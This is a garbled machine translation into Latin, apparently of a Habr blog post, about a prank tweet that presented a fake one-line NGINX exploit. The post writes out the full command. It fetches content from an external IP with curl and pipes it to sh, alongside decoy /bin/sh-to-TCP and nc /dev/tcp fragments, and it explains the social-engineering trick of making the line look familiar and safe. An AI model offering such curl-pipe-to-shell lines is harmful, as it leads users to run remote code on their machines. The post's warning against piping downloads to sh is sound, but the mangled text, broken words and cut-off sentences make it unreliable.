Nota. transl.:
TL;DR: Noli uti file pipelining in sh vel vercundus in aliquo casu. Magna haec via est ut computatrum tuum imperium amittas.
Volo tecum communicare brevem fabulam de facinore comico PoC qui die 31 mensis Maii creatus est. Confestim apparuit responsio ad nuntium e
Novam obfuscationis technicam in Crispum operam peractum, primum exemplaribus viminibus adscripsi et "PoC operantem" constans ex una linea codicis, quae vulnerabilitatem detectam velut agebat. Nimirum hoc erat nugae plenariae. Posui me statim exponi, et ut optime duos retweetes (o bene).
Sed quid deinde acciderit non potui existimare. Mea tweet popularis skyrocketed. Mire, momento temporis (15:00 Moscuae Iunii 1) pauci homines intellexerunt hoc fictum esse. Multi homines eam retweet sine ulla reprimendo ( nedum admirantes amabilem ASCII graphics outputs ).
Spectate quam formosa est!
Cum omnes hae ansae et colores magnae sint, manifestum est quod homines in eorum machina ad eos videndos codicem currere debuerunt. Feliciter navigatores eodem modo laborant, et cum eo quod ego non vere in legali negotio laborare cupimus, codicem in meo situ sepultum erat, sicut resonare vocat, sine ullo codice addito instituere vel exequi conanti.
Parvus digressio;
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
Socio-electronic engineering (SEE) - plus quam iustus hamatae
Salus et familiaritas maior pars huius experimenti fuerunt. Quas res bene gestas esse arbitror. Praeceptum lineae securitatis evidenter implicatam referendo ad "127.0.0.1" (notum localem exercitum). Localhost securum censetur et in eo notitia computatorium tuum numquam relinquit.
Familiaritas fuit secunda pars experimenti SEDIS clavis. Cum auditorium scopum imprimis constabat ab hominibus notis fundamentalibus securitatis computatralis, magni momenti erat codicem creare ut partes eius familiares et familiares videbantur (et ideo tutus). De commodato elementis veteris facinoris notiones et eas inusitato modo deducentes valde prosperas esse probavit.
Subter accurata analysis unius lineae est. Omnia in hoc indice wears medicamine naturaet ad operationem eius actualem nihil requiritur.
Quae elementa vere necessaria sunt? Hoc -gsS
, -O 0x0238f06a
, |sh
et telam ipsum servo. Tela server non continebat aliquas malicias instructiones, sed solum ASCII graphics utentes mandata echo
in scripto continebat index.html
. Utentis ingressus lineam |sh
in medio, index.html
onerata et supplicio affecit. Fortunate custodes interretiales non male habebant.
-
../../../%00
β ultra presul repraesentat; -
ngx_stream_module.so
β iter ad NGINX temere moduli; -
/bin/sh%00<'protocol:TCP'
- sumus velut launching/bin/sh
in machina scopo et output ad TCP alveum redigere; -
-O 0x0238f06a#PLToffset
- secretum medicamentum, suppletum est#PLToffset
ut viderem quasi memoriam cinguli quodam modo in PLT contento; -
|sh;
β Aliud fragmentum magni momenti. Nobis opus est ad output ad sh/bash redigere ut signum exsequatur quod ab oppugnatione interretiali servo sito ad0x0238f06a
(2.56.240.x
); -
nc /dev/tcp/localhost
- phantasma in quo netcat refers to/dev/tcp/localhost
ut tuta omnia cernerent. Nam in acie decoris nihil agit.
Hoc concludit decoding scripturae unius lineae et disceptatio de aspectibus "socio-electronicae machinationis" (intricatae hamatae).
Servo interretiali configurationis et countermeasures
Cum magna pars signatorum meorum infosec/hackers sunt, placuit ut interretialem servitorem paulo repugnantiorem expressionibus "curae" ex parte eorum reddere decrevi, ita ut guys aliquid facere (et iocum esset. erigi). Non recensebimus omnes casus hic cum experimentum adhuc continuatur, sed hic pauca sunt quae ministrans facit;
- Active monitores distributionem in certa retis socialibus inceptis substituunt ac varias praevias ailnthubmas ad confirmandum utentem ad deprimendum nexum.
- Redirects Chrome/Mozilla/Safari/etc ad Thugcrowd promo video loco ostendens testam scripturam.
- Observat obvios signa intrusionis/blatintia caesim, et tunc incipit redirectio petitiones ad NSA ministrantium (ha!).
- Instruit Troianum, sicut etiam BIOS rootkit, in omnibus computatoriis quorum utentes hospitem ex iusto navigatro visitant (tantum kidding!).
Parva pars antimers
In hoc casu, unicum propositum meum fuit ut quasdam Apache lineamenta - nominatim, regulas frigidas ad redirectionem petitionum, - et cogitabam: quidni?
NGINX Expletandum (Verus!)
ut subscribe
Source: www.habr.com